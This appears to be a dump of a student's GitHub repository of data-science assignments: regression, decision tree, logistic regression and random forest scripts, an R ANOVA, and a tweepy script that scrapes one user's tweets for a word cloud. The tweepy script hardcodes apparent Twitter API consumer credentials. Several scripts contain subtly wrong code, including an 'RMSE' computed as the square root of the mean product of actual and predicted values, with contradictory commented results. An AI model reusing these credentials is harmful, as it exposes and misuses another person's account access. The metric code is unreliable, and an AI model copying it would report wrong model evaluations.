building\r\nmodel.fit(x_train,y_train) #model training\r\n\r\n#predicting the results\r\ny_pred= model.predict(x_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\r\n\r\n#scatterplot of predicted vs actual values \r\nplt.scatter(y_pred,y_test)\r\n\r\n#saving the results in dataframe\r\ndf['pred']=model.predict(x)\r\n\r\n#correlation between actual and predicted values\r\ndf['price'].corr(df['pred']) #0.8806 \r\n\r\n#RMSE value for test data\r\ntest_rmse =np.sqrt(np.mean(y_test*y_pred))#2260.56\r\n\r\n#R^2 value\r\nfrom sklearn.metrics import r2_score\r\ntest_r2_Score= r2_score(y_test,y_pred) #0.8612\r\n\r\nprint(test_rmse) #2260.56\r\nprint(test_r2_Score)#0.7743\r\n\r\n\r\n#Backward elimination#\r\nx=np.append(arr=np.ones((6259,1)).astype(int),values=x,axis=1)\r\nimport statsmodels.regression.linear_model as lm\r\nx_opt=x[:,0:]\r\nmodel_be=lm.OLS(endog=y,exog=x_opt).fit()\r\nmodel_be.summary() #since every variable is having pvalue<0.05, we'll consider the model as the final model.\r\n" }, { 
"alpha_fraction": 0.8222222328186035, "alphanum_fraction": 0.8222222328186035, "avg_line_length": 21, "blob_id": "0877082a793c73b07f7b23b8fb8737985c7a2ba8", "content_id": "bfd71eaba0f34f87931329c23674e25794b16d29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 45, "license_type": "no_license", "max_line_length": 26, "num_lines": 2, "path": "/README.md", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# Data-Science-Assignments\nAssignments done \n" }, { "alpha_fraction": 0.6719191670417786, "alphanum_fraction": 0.6941413879394531, "avg_line_length": 23.71875, "blob_id": "11763fdab8897eae96c615720214bc6157b9b8a9", "content_id": "1652915d77f03d75cd5efbf35ccef34f59631c40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2475, "license_type": "no_license", "max_line_length": 128, "num_lines": 96, "path": "/Multi linear Regession/corolla.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 10 20:10:51 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.style as style\r\n\r\nstyle.use('tableau-colorblind10')\r\n\r\n#importing dataset\r\ncorolla= pd.read_csv('E:\\\\Tej\\Assignments\\\\Asgnmnt\\\\Multi linear Regession\\\\ToyotaCorolla.csv',encoding='latin1')\r\ncorolla\r\n\r\n#EDA\r\ncorolla.columns\r\ncorolla.head()\r\ndf=corolla[[\"Price\",\"Age_08_04\",\"KM\",\"HP\",\"cc\",\"Doors\",\"Gears\",\"Quarterly_Tax\",\"Weight\"]] #selecting given columns for operation\r\n\r\ndf.head() #top 5 obserations\r\ndf.info() #laast 5 operations\r\ndf.dropna() #drop na values #df.fillna(0) to fill na values with zero\r\ndf.describe()\r\n\r\nimport seaborn as sns\r\nsns.barplot(x='Doors',y='Price',data=df)\r\nsns.barplot(x='Gears',y='Price',data=df)\r\n\r\ndf['Gears'].value_counts().plot(kind='pie')\r\ndf['Doors'].value_counts().plot(kind='pie')\r\n\r\nsns.distplot(df['Price'],kde=True)\r\nsns.distplot(df['KM'],kde=True)\r\n\r\nplt.scatter(df.Price,df.KM)\r\ndf.Price.corr(df.KM) #price decreases with km\r\n\r\nsns.catplot(x='Doors',y='Price',data=df,kind='box')\r\nsns.heatmap(df.corr(),annot=True)\r\n\r\n#filling 1 values in KM column with nan and replacing with mean of the column\r\nfrom numpy import nan\r\ndf.loc[df['KM']]=df['KM'].replace(1,nan)\r\ndf.fillna(df.mean(),inplace=True)\r\ndf.isna().sum() #0\r\n\r\nimport seaborn as sns\r\nsns.pairplot(df)\r\n\r\n\r\n#splitting data into x and y\r\ny=df.iloc[:,0]\r\nx=df.iloc[:,1:]\r\n\r\n\r\n#train test split\r\nfrom sklearn.model_selection import train_test_split\r\nx_train, x_test, y_train, y_test=train_test_split(x,y,test_size=0.3,random_state=0)\r\n\r\n\r\n#since this is produced as a series object we've to convert it to np to produce results\r\ny=y.to_numpy()\r\ny_test=y_test.to_numpy()\r\n\r\n\r\n#building model\r\nfrom sklearn.linear_model import LinearRegression\r\nmodel=LinearRegression() #build the model\r\nmodel.fit(x_train,y_train) #train the model\r\nprint(model.score(x_test,y_test)) #0.6555--> poor model\r\n\r\n#predicting the results\r\ny_pred= model.predict(x_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))\r\n\r\nplt.scatter(y_pred,y_test)\r\n\r\n#saving results in the 
dataset\r\ndf['pred']=(model.predict(x))\r\n\r\ny_resid= y_pred-y_test\r\n\r\n#standardized residuals\r\ny_rmse= np.sqrt(np.mean(y_pred*y_test))\r\n\r\nfrom sklearn.metrics import r2_score\r\ntest_r2s=r2_score(y_test,y_pred)\r\n\r\nprint(y_rmse) #10895.54\r\nprint(test_r2s) #0.655\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6585437655448914, "alphanum_fraction": 0.6823253035545349, "avg_line_length": 29.5, "blob_id": "ca664cf4098415b3a3e80b22bc83ded8378fd128", "content_id": "cb21bda1e0d988f1c3779aedcafa5df1042287d5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3406, "license_type": "no_license", "max_line_length": 122, "num_lines": 108, "path": "/Decision Tree/Company data Decision Tree.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 29 19:25:47 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('E:\\Tej\\Assignments\\Asgnmnt\\Decision Tree\\Company_Data.csv')\r\ndata\r\ndata.describe()\r\ndata.info() #no null values\r\ndata.columns\r\n\r\ndata_cat = ['ShelveLoc','Urban', 'US']\r\n\r\n#Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = number.fit_transform(data[i])\r\n \r\nlabel_enc = LabelEncoder()\r\ndata['sales'] = label_enc.fit_transform(pd.cut(data['Sales'],bins = 2, retbins = True )[0]) #converting data into two bins\r\ndata = data.drop('Sales',axis = 1) #dropping the existing Sales column\r\n\r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x= 'ShelveLoc',data =data)\r\nsns.countplot(x= 'Urban',data =data)\r\nsns.countplot(x= 'US',data =data)\r\n\r\nsns.barplot(data.sales,data.Price)\r\nsns.barplot(data.sales,data.Income)\r\nsns.barplot(data.Urban,data.Income)\r\n\r\nsns.boxplot(x='CompPrice',data = data)\r\nsns.boxplot(x ='Population',data = data) #no outlier\r\nsns.boxplot(x='Price',data = data) \r\nsns.boxplot(x='Age',data =data) #no outlier\r\nsns.boxplot(x= 'Education',data = data) #no outlier\r\nsns.boxplot(x= 'Income',data = data) #no outlier\r\nhelp(sns.boxplot) \r\n\r\nsns.boxplot(x = 'sales', y = 'CompPrice', data = data)\r\nsns.boxplot(x = 'sales', y = 'Population', data = data)\r\nsns.boxplot(x = 'sales', y = 'Price', data = data)\r\nsns.boxplot(x = 'sales', y = 'Income', data = data)\r\n\r\ndata.sales.value_counts() #0=241,1=159\r\n#imbalance in the sales variable will cause bias in the model. 
so, now we will go for resampling\r\n\r\nmajority_class = data[data.sales == 0] \r\nminority_class = data[data.sales == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 241, #samples matching majority class\r\n random_state = 123) #reproducing results\r\n\r\ndata_sampled = pd.concat([majority_class,minority_class_unsampled])\r\n#determining x and y data\r\nX= data_sampled.iloc[:,0:10]\r\nY= data_sampled.iloc[:,-1]\r\n\r\n#separating train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y,test_size = 0.20,random_state = 42)\r\n\r\n# building decision tree classification model\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nmodel = DecisionTreeClassifier(criterion = 'entropy',random_state = 0)\r\nmodel.fit(x_train,y_train)\r\n\r\n#predicting on test data\r\ny_pred = model.predict(x_test)\r\n#getting accuracy score\r\n\r\n#getting accuracy score\r\nfrom sklearn import metrics\r\nmetrics.accuracy_score(y_test,y_pred) #89.69%\r\n\r\n\r\npd.crosstab(y_test,y_pred)\r\nmodel.score(x_train,y_train)\r\n\r\n#accuracy score of test data\r\nmodel.score(x_test,y_test) #0.896\r\n\r\n#storing predictions to the data\r\ndata['y_pred'] = model.predict(data.iloc[:,0:10]) \r\npd.crosstab(data.sales,data.y_pred).plot(kind = 'bar')\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = print(confusion_matrix(data.sales, data.y_pred))\r\nnp.mean(data.y_pred == data.sales) #0.945\r\n\r\n#overall accuracy\r\nmodel.score(X,Y) #0.979\r\nmodel.predict([[135,80,12,302,100,1,50,20,1,0]])\r\n\r\nfrom sklearn import tree\r\ntree.plot_tree(model.fit(x_train,y_train))\r\n\r\n\r\n" }, { "alpha_fraction": 0.5127776265144348, "alphanum_fraction": 0.555290162563324, "avg_line_length": 31.214284896850586, "blob_id": "6f18f323e1ed26a33e18c918a7ed8c5a67d117e5", "content_id": "97d4b0ca04aac306823b2840d3d898acc53a3cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4197, "license_type": "no_license", "max_line_length": 133, "num_lines": 126, "path": "/Text mining 1/twitter.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 4 11:12:35 2020\r\n\r\n@author: Vinayak Dhotre\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport warnings\r\nimport tweepy\r\nfrom wordcloud import WordCloud\r\n#conda install -c conda-forge wordcloud\r\n#credentials\r\nconsumer_key = \"e5er9Ba7ACWjxmkCSCEpdMTv2\"\r\nconsumer_secret = \"Qv1BfqtglOWoh3F7olX1G0Tsa2JbDuus7KEdSmJkGL1JMKpQwT\"\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\napi = tweepy.API(auth)\r\n\r\n#getting first 200 tweets\r\nuserID= 'dhruv_rathee'\r\ntweets = api.user_timeline(screen_name=userID, \r\n # 200 is the maximum allowed count\r\n count=200,\r\n include_rts = False,\r\n # Necessary to keep full_text \r\n # otherwise only the first 140 words are extracted\r\n tweet_mode = 'extended'\r\n )\r\n\r\noldest = tweets[-1].id - 1\r\n\r\n \r\n#info on fist 3tweets\r\nfor info in tweets[:3]:\r\n print(\"ID: {}\".format(info.id))\r\n print(info.created_at)\r\n print(\"\\n\")\r\n\r\n# =============================================================================\r\n# 
=============================================================================\r\n# ID: 1323694224957734914\r\n# 2020-11-03 18:31:10\r\n# Eagerly waiting to say bye bye to Doland Trump Chacha tomorrow 🤞\r\n# \r\n# \r\n# ID: 1323226147572908040\r\n# 2020-11-02 11:31:12\r\n# Oh acha, aisa hai kya?\r\n# \r\n# Are you talking about this video? Guys, can you please watch and share this video to know if she’s talking about this video or not?\r\n# \r\n# 👉https://t.co/sDaPWuP8rP\r\n# \r\n# Because I didn’t receive any payment https://t.co/Reu72RUQ3V\r\n# \r\n# \r\n# ID: 1322927160340975617\r\n# 2020-11-01 15:43:08\r\n# New Video on France Attacks \r\n# \r\n# Watch: https://t.co/RKw8i3PAmI https://t.co/sF73vJtxVR\r\n# =============================================================================\r\n# =============================================================================\r\n\r\n#extracting all tweets\r\nall_tweets = []\r\nall_tweets.extend(tweets)\r\noldest_id = tweets[-1].id\r\nwhile True:\r\n tweets = api.user_timeline(screen_name=userID, \r\n # 200 is the maximum allowed count\r\n count=200,\r\n include_rts = False,\r\n max_id = oldest_id - 1,\r\n # Necessary to keep full_text \r\n # otherwise only the first 140 words are extracted\r\n tweet_mode = 'extended'\r\n )\r\n if len(tweets) == 0:\r\n break\r\n oldest_id = tweets[-1].id\r\n all_tweets.extend(tweets)\r\n print('N of tweets downloaded till now {}'.format(len(all_tweets))) \r\n \r\n\r\n\r\n#data cleaning\r\nfrom pandas import DataFrame\r\nouttweets = [[tweet.id_str, \r\n tweet.created_at, \r\n tweet.favorite_count, \r\n tweet.retweet_count,\r\n tweet.full_text.encode(\"utf-8\").decode(\"utf-8\")]\r\n for idx,tweet in enumerate(all_tweets)]\r\ndf = DataFrame(outtweets,columns=[\"id\",\"created_at\",\"favorite_count\",\"retweet_count\", \"text\"])\r\n\r\n#getting frequency of words using count vectorizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\ncv = CountVectorizer(stop_words = 'english')\r\nwords = cv.fit_transform(df.text)\r\nsum_words = words.sum(axis=0)\r\n\r\nwords_freq = [(word, sum_words[0, i]) for word, i in cv.vocabulary_.items()]\r\nwords_freq = sorted(words_freq, key = lambda x: x[1], reverse = True)\r\nfrequency = pd.DataFrame(words_freq, columns=['word', 'freq'])\r\n\r\n#frequency plot\r\nfrequency.head(30).plot(x='word', y='freq', kind='bar', figsize=(15, 7), color = 'blue')\r\nplt.title(\"Most Frequently Occuring Words - Top 30\")\r\n#https, bjp, india, people ,modi\r\n\r\n#plotting wordcloud\r\nall_words = ' '.join([text for text in df['text']])\r\nfrom wordcloud import WordCloud\r\nwordcloud = WordCloud(width=800, height=500, random_state=21, max_font_size=110).generate(all_words)\r\nplt.title('Dhruv Rathee Tweet Analysis')\r\nplt.figure(figsize=(10, 7))\r\nplt.imshow(wordcloud, interpolation=\"bilinear\")\r\nplt.axis('off')\r\nplt.show()\r\n\r\n" }, { "alpha_fraction": 0.6650132536888123, "alphanum_fraction": 0.6875, "avg_line_length": 31.932584762573242, "blob_id": "960e101d6891c2f9b20bd6f5c226c9b8175c627b", "content_id": "3b4aedfe91089232029fb2e6edc4bafa25652204", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3024, "license_type": "no_license", "max_line_length": 91, "num_lines": 89, "path": "/Decision Tree/Fraud_check.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 29 17:04:15 2020\r\n\r\n@author: 
Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Decision Tree\\\\Fraud_check.csv')\r\ndata\r\ndata.info() #no-null values\r\ndata.columns\r\ndf = data['Taxable.Income']\r\ndata['status'] = np.where(df<=30000,'Risky','Good`')\r\ndata_cat = ['Undergrad', 'Marital.Status','Urban','status']\r\n\r\n#encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = number.fit_transform(data[i])\r\n\r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x='Undergrad',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Marital.Status',data=data).plot(kind = 'bar')\r\nsns.countplot(x='Urban',data=data).plot(kind = 'bar')\r\nsns.countplot(x='status',data=data).plot(kind = 'bar') #largely imbalanced\r\n\r\nsns.boxplot(x= 'Marital.Status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'City.Population',data = data)\r\nsns.boxplot(x= 'status',y= 'Work.Experience',data = data)\r\n\r\npd.crosstab(data['Marital.Status'],data.status).plot(kind = 'bar')\r\n#dropping the Taxable.Income Column as we've converted it into the categorical variable\r\ndata = data.drop('Taxable.Income',axis = 1)\r\n\r\n##Oversampling to avoid any information loss and to deal with the bias\r\ndata.status.value_counts() # 0=476,1=124\r\nmajority_class = data[data.status == 0]\r\nminority_class = data[data.status == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 476, #to match majority class\r\n random_state = 123) #reproducible results\r\n\r\ndf_unsampled = pd.concat([majority_class,minority_class_unsampled])\r\ndf_unsampled.status.value_counts() # 0=476,1 =476\r\npd.crosstab(df_unsampled['Marital.Status'],df_unsampled.status).plot(kind = 'bar') #no bias\r\n\r\n#separating x and y variables\r\nX= df_unsampled.iloc[:,0:5]\r\nY= df_unsampled.iloc[:,-1]\r\n\r\n#splitting into test and train data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y, test_size = 0.3,random_state = 42)\r\n \r\n#building classification model\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nmodel = DecisionTreeClassifier(criterion = 'entropy',min_samples_split = 2)\r\nmodel.fit(x_train,y_train)\r\nmodel.predict(x_test)\r\n\r\n#accuracy on test data\r\nmodel.score(x_test,y_test) #0.8461\r\n\r\n#storing the predictions\r\ndata['y_pred'] = model.predict(data.iloc[:,0:5]) \r\npd.crosstab(data.status,data.y_pred)\r\n\r\n#getting accuracy scores\r\nmodel.score(data.iloc[:,0:5],data.iloc[:,-1]) #1.0\r\nmodel.score(X,Y) #0.9538\r\n\r\n#confusion matrix\r\nfrom sklearn.metrics import confusion_matrix\r\ncm = confusion_matrix(data.status,data.y_pred)\r\ncm\r\n\r\n#Visualizing the tree\r\nfrom sklearn import tree\r\ntree.plot_tree(model.fit(x_train,y_train))\r\n\r\n\r\n" }, { "alpha_fraction": 0.7044887542724609, "alphanum_fraction": 0.7244389057159424, "avg_line_length": 24.766666412353516, "blob_id": "0201094ff40149faad327987f4aa94741d3aea96", "content_id": "58fb806af3975e571bd40c3a6c3ec466fabc878a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 802, "license_type": "no_license", "max_line_length": 108, "num_lines": 30, "path": "/Hypothesis/LABTAT code.R", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", 
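# Hedged alternative to the resample()-based oversampling in the fraud-check
# decision tree above: sklearn can reweight classes directly instead of
# duplicating minority rows. Sketch only; X and Y follow the names used in
# that script and are not redefined here.
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
x_tr, x_te, y_tr, y_te = train_test_split(X, Y, test_size=0.3,
                                          random_state=42, stratify=Y)
balanced_dt = DecisionTreeClassifier(criterion='entropy',
                                     class_weight='balanced',
                                     random_state=0).fit(x_tr, y_tr)
print(balanced_dt.score(x_te, y_te))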
"text": "library(readxl)\r\nLAB<-read_excel(\"E:/Tej/Assignments/Asgnmnt/Hypothesis/LabTAT.xls\") # ContractRenewal_Data(unstacked).xlsx\r\nView(LAB)\r\nStacked_Data <- stack(LAB)\r\nView(Stacked_Data)\r\nattach(Stacked_Data)\r\n\r\n\r\nshapiro.test(LAB$`Laboratory 1`)\r\nshapiro.test(LAB$`Laboratory 2`)\r\nshapiro.test(LAB$`Laboratory 3`)\r\nshapiro.test(LAB$`Laboratory 4`)\r\n\r\nsummary(LAB)\r\nhist(LAB$`Laboratory 1`)\r\nhist(LAB$`Laboratory 2`)\r\nhist(LAB$`Laboratory 3`)\r\nhist(LAB$`Laboratory 4`)\r\nqqnorm(LAB$`Laboratory 1`)\r\n\r\n# Data is normally distributed\r\nlibrary(car)\r\n# Test for vaiance\r\nleveneTest(values ~ ind, data = Stacked_Data)\r\n?leveneTest\r\nAnova_results <- aov(values~ind,data = Stacked_Data)\r\nsummary(Anova_results)\r\nprint(Anova_results)\r\n# p-value = 0.104 > 0.05 accept null hypothesis \r\n# All Proportions all equal " }, { "alpha_fraction": 0.6890214681625366, "alphanum_fraction": 0.7088305354118347, "avg_line_length": 32.344261169433594, "blob_id": "aafdbf40d8d22e78369182f2eb81383f26c659e2", "content_id": "864e6bef4e725d0d50f1c01c5821ea0b28548978", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4190, "license_type": "no_license", "max_line_length": 99, "num_lines": 122, "path": "/Logistic regression/bank data-1.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*--\r\n\"\"\"\r\nCreated on Wed Aug 19 23:01:37 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\n\r\ndata= pd.read_csv(\"E:\\\\Tej\\Assignments\\\\Asgnmnt\\\\Logistic regression\\\\bank-full.csv\",delimiter=';')\r\ndata.head()\r\n\r\n#changing unknown values with mode of the data(imputation)\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber= LabelEncoder()\r\ndata.job=number.fit_transform(data.job)\r\ndata.marital=number.fit_transform(data.marital)\r\ndata.education=number.fit_transform(data.education)\r\ndata.default=number.fit_transform(data.default)\r\ndata.housing=number.fit_transform(data.housing)\r\ndata.loan=number.fit_transform(data.loan)\r\ndata.month=number.fit_transform(data.month)\r\ndata.poutcome=number.fit_transform(data.poutcome) \r\ndata.y=number.fit_transform(data.y) \r\n\r\n\r\n#dropping irrelevant variables\r\nsns.countplot(x='marital',hue='y',data=data)\r\nsns.countplot(x='education',hue='y',data=data)\r\nsns.countplot(x='default',hue='y',data=data) # drop- skewed towards zero\r\nsns.countplot(x='housing',hue='y',data=data) \r\nsns.countplot(x='loan',hue='y',data=data) #drop=skewed towards zero\r\nsns.countplot(x='contact',hue='y',data=data) #insignificant for the prediction model\r\n\r\ndata.y.value_counts() #0-39922,1-5289\r\n#variables for building the model\r\ncat_var= data[['age', 'job', 'marital', 'education', 'default', 'balance', 'housing',\r\n 'loan', 'day', 'month', 'duration', 'campaign', 'pdays',\r\n 'previous', 'poutcome']]\r\ndata.columns\r\ndata.isnull().sum()\r\ncat_var.mode()\r\ncat_var.skew()\r\ncat_var.kurt()\r\ncat_var.shape\r\ncat_var.nunique()\r\ncat_var.dropna().shape\r\ncat_var['education'].value_counts()\r\ncat_var['poutcome'].value_counts() #0-39922,1-5289 this imbalance in data will lead to bias.\r\n\r\n\r\nfor col in cat_var:\r\n plt.figure(figsize=(10,4))\r\n sns.barplot(cat_var[col].value_counts(),cat_var[col].value_counts().index)\r\n plt.title(col)\r\n plt.tight_layout()\r\n\r\n\r\n#to remove the entire 
row containing na values #data= data[data.job!='unknown']\r\n\r\npd.crosstab(data.job,data.marital).plot(kind='bar')\r\npd.crosstab(data.job,data.default).plot(kind='bar')\r\npd.crosstab(data.housing,data.loan).plot(kind='bar')\r\npd.crosstab(data.education,data.default).plot(kind='bar')\r\npd.crosstab(data.housing,data.marital).plot(kind='bar')\r\n#data are imbalanced, so we will resample the data to get the balanced data for classification\r\n\r\n##oversampling\r\nmajority_class = cat_var[cat_var.poutcome == 0]\r\nminority_class = cat_var[cat_var.poutcome == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_unsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 39922, #to match majority class\r\n random_state = 123) #reproduce results\r\n\r\ndata_resampled = pd.concat([majority_class,minority_class_unsampled])\r\n\r\n#separating dependent andindependent variables\r\nX= data_resampled.iloc[:,0:14]\r\nY= data_resampled.iloc[:,-1]\r\n\r\n#splitting into train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test=train_test_split(X,Y,test_size=0.25,random_state=0)\r\ny_train.value_counts().nunique()\r\ny_test.value_counts()\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nclassifier=LogisticRegression()\r\nclassifier.fit(x_train,y_train)\r\nclassifier.score(x_test,y_test)\r\nclassifier.score(x_train,y_train) #0.762\r\nclassifier.score(cat_var.iloc[:,0:14],cat_var.iloc[:,-1]) #0.789\r\n\r\n#getting coefficients and intercepts\r\nclassifier.coef_\r\nclassifier.intercept_\r\n\r\n#getting results on test data\r\npredictions=classifier.predict(x_test)\r\n\r\n#gerring predictions on original data\r\ny_prob=pd.DataFrame(classifier.predict(cat_var.iloc[:,0:14]))\r\nnew_df= pd.concat([cat_var,y_prob],axis=1)\r\n\r\n#accurcy on original data\r\nnp.mean(cat_var.poutcome == new_df[0]) #0.789\r\n\r\npd.crosstab(new_df.poutcome,new_df[0]).plot(kind = 'bar')\r\n\r\nfrom sklearn.metrics import confusion_matrix\r\nconfusion_matrix=confusion_matrix(y_test,predictions)\r\nconfusion_matrix\r\n\r\n#accuracy on test data\r\nnp.mean(y_test == predictions) #0.7600\r\n" }, { "alpha_fraction": 0.6712638139724731, "alphanum_fraction": 0.6883149743080139, "avg_line_length": 35.980953216552734, "blob_id": "f93450bddbd5767eb8e01437de67281c8de49403", "content_id": "76febd4db5253ab2b841990e04b5c83a9e390d14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3988, "license_type": "no_license", "max_line_length": 174, "num_lines": 105, "path": "/Random forest/company_data_RF.py", "repo_name": "tejaswinikurane/Data-Science-Assignments", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 30 16:38:22 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndata = pd.read_csv('E:\\\\Tej\\\\Assignments\\\\Asgnmnt\\\\Random forest\\\\Company_Data.csv')\r\ndata.info()\r\ndata.describe()\r\ndata.info() #no null values\r\ndata.columns\r\n\r\ndata_cat = ['ShelveLoc','Urban', 'US']\r\n\r\n#Encoding categorical data\r\nfrom sklearn.preprocessing import LabelEncoder\r\nnumber = LabelEncoder()\r\nfor i in data_cat:\r\n data[i] = number.fit_transform(data[i])\r\n \r\nlabel_enc = LabelEncoder()\r\ndata['sales'] = label_enc.fit_transform(pd.cut(data['Sales'],bins = 2, retbins = True )[0]) #converting data into two bins\r\ndata = data.drop('Sales',axis = 1) #dropping the existing Sales 
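# Hedged addition for the logistic model above: accuracy alone can mislead on
# resampled data, so an AUC and a per-class report are worth printing. Sketch
# reusing the classifier, x_test and y_test names from the bank-data script.
from sklearn.metrics import roc_auc_score, classification_report
probs = classifier.predict_proba(x_test)[:, 1]
print(roc_auc_score(y_test, probs))
print(classification_report(y_test, classifier.predict(x_test)))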
column\r\n\r\n#EDA\r\nimport seaborn as sns\r\nsns.countplot(x= 'ShelveLoc',data =data)\r\nsns.countplot(x= 'Urban',data =data)\r\nsns.countplot(x= 'US',data =data)\r\n\r\nsns.barplot(data.sales,data.Price)\r\nsns.barplot(data.sales,data.Income)\r\nsns.barplot(data.Urban,data.Income)\r\n\r\nsns.boxplot(x='CompPrice',data = data)\r\nsns.boxplot(x ='Population',data = data) #no outlier\r\nsns.boxplot(x='Price',data = data) \r\nsns.boxplot(x='Age',data =data) #no outlier\r\nsns.boxplot(x= 'Education',data = data) #no outlier\r\nsns.boxplot(x= 'Income',data = data) #no outlier\r\nhelp(sns.boxplot) \r\n\r\nsns.boxplot(x = 'sales', y = 'CompPrice', data = data)\r\nsns.boxplot(x = 'sales', y = 'Population', data = data)\r\nsns.boxplot(x = 'sales', y = 'Price', data = data)\r\nsns.boxplot(x = 'sales', y = 'Income', data = data)\r\n\r\ndata.sales.value_counts() #0=241, 1=159\r\n#imbalance in the sales variable would bias the model, so we resample\r\n\r\nmajority_class = data[data.sales == 0]\r\nminority_class = data[data.sales == 1]\r\n\r\nfrom sklearn.utils import resample\r\nminority_class_upsampled = resample(minority_class,\r\n replace = True, #sample with replacement\r\n n_samples = 241, #samples matching majority class\r\n random_state = 123) #reproducible results\r\n\r\ndata_sampled = pd.concat([majority_class,minority_class_upsampled])\r\n#determining x and y data\r\nX= data_sampled.iloc[:,0:10]\r\nY= data_sampled.iloc[:,-1]\r\n\r\n#separating train and test data\r\nfrom sklearn.model_selection import train_test_split\r\nx_train,x_test,y_train,y_test = train_test_split(X,Y,test_size = 0.20,random_state = 42)\r\n\r\n\r\n#Building Random Forest classifier\r\n#After each tree is built, all of the data are run down the tree, and proximities are computed for\r\n# each pair of cases. If two cases occupy the same terminal node, their proximity is increased by one.\r\n# At the end of the run, the proximities are normalized by dividing by the number of trees. Proximities\r\n# are used in replacing missing data, locating outliers, and producing illuminating low-dimensional views\r\n# of the data.\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nmodel = RandomForestClassifier(n_jobs = 8, n_estimators = 1000, oob_score = True, criterion = 'entropy')\r\n# oob - out-of-bag sampling: no need for cross-validation or a separate test set to get an unbiased estimate of the test set error. 
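# (continuing the out-of-bag note) a self-contained illustration on toy data,
# assuming nothing from this script beyond sklearn itself: with oob_score=True
# the fitted forest exposes the out-of-bag accuracy as an attribute.
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier as RFDemo
Xd, yd = make_classification(n_samples=300, random_state=0)
rf_demo = RFDemo(n_estimators=200, oob_score=True, random_state=0).fit(Xd, yd)
print('OOB accuracy:', rf_demo.oob_score_)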
